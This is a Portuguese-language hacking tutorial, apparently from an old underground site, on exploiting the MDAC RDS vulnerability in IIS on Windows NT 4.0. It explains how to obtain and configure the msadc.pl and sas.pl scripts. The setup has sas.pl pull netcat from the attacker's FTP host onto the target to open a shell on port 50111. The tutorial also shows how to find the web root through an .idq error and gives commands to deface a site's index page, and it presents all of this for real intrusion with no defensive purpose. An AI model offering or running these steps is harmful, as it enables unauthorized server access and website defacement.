| |
|
Bug (Rds)
Introdução
Ae! Essa técnica esta meio ultrapassada, mas muitos ainda não conhecem,
e ainda funfa
em servidores winnt4.0. Estamos falando do pacote MDAC (Microsoft Data
Access Components)
e da vulnerabilidade encontrada no RDS que, em conjunto com o uso do
acesso de dados
via ODBC, possibilita o acesso não autorizado ao servidor Windows.
Do que eu preciso?
é necessário o Perl instalado no seu sistema, caso não tem, entre em
www.perl.com e
pegue a versão do seu só. você precisa tb de dois arquivos: msadc.pl e
sas.pl. Podem ser
encontrados no site www.hack.co.za. Chegando lá, entre na parte de
WindowsNT e procure por
'rds_rootkit.zip' e faca o download (duh). Se você preferir,faca um
servidor de ftp na sua
maquina ( você saberá pq mais abaixo ). Ou então, cadastre-se em algum
servidor gratuito
e envie o nc (netcat) para lá. O nc pode ser encontrado no site
www.l0pht.com/~weld/netcat
Envie-o o nc puro, ou seja, evie-o com extensão .exe (send nc.exe).
Observações
(1) Coloque o sas.pl e o msadc.pl dentro do diretório C:\Perl\Bin. /*
winusers */
(2) Edite o arquivo sas.pl para configura-lo (use qualquer editor):
$port = 50111; # porta q será aberta no server
$your = "200.211.896.23"; # ftp de onde se encontra o nc
$user = "anonymous"; # usuário para acessar o ftp
$pass = 'password'; # password do usuário
O sas.pl vai entrar no ftp especificado por você e ira pegar
o nc.exe, enviando-o para o servidor especificado. Caso opte por fazer
um servidor de ftp na sua maquina, entre em www.grátis.com.br e pegue
algum lá.Caso opte por cadastrar um site, entre em www.domainvalet.com
e cadastre um site .com, .org ou .net e envie o nc.exe para lá.
Como saber se o host esta vulnerável?
Para saber se uma maquina esta vulnerável ao ataque de rds,você precisa
ir no seu browser e digitar:
http://www.Servidor.Com.br/msadc/msadcs.dll
Caso o arquivo seja encontrado, provavelmente o servidor esta
vulnerável.
Entrando no sistema
Finalmente a parte mais interessante. Porem, para você entrar no
sistema,
a sua maquina já deve estar com o perl instalado.
Segue a string:
perl sas.pl www.host-alvo.com
O sas.pl vai buscar o nc.exe no ftp solicitado e depois vai envia-lo
para
o host especificado. Pode ate parecer que é o sas.pl que faz todo o
trabalho,
mas não é! Depois você olha no código dos dois p/ você ver como
funciona. Se a
maquina realmente estiver vulnerável, o telnet será aberto e acessara a
porta
aberta pelo nc ( aquela que esta no sas.pl, a porta 50111 ) e você caira
no:
c:\winnt\system32
Para você hackear a page, faca o seguinte:
perl msadc.pl -h www.host-alvo.com -C "echo FuckZ Admin! > C:\caminhodoroot\index.html"
Mas, como vou saber o caminho do root? Simples, basta você digitar no
seu browser:
www.host-alvo.com/qualquercoisa.idq
Logo, vai aparecer algo como:
The IDQ file C:\Inetpub\wwwroot\algumacoisa.idq could not be found
Ótimo! Agora sabemos o caminho do root (C:\inetpub\wwwroot). então,
vamos fazer o seguinte:
perl msadc.pl -h www.host-alvo.com -C "Hacked por mim! > C:\inetpub\wwwroot\index.html"
Parabéns, você conseguiu!
Obs: Certifique-se de qual o index da pagina principal (se é index.html,
ou index.html,
ou default.asp, etc). Por exemplo, você quer hackear o site
www.nasa.com.br e o index da
page principal é eu.asp, então, você deve digitar assim:
perl msadc.pl -h www.nasa.com.br -C "echo hacked por mim! > c:\inetpub\wwwroot\eu.asp
Pronto!
FINALIZANDO
Como viram, essa é uma das mil falhas que podemos tirar proveito. Mas o
q eu fico
mais encabulado, é porque, mesmo sabendo que o IIS (Infelizmente
Ignoramos segurança) é
uma porcaria, os administradores insistem em usa-lo...
|
|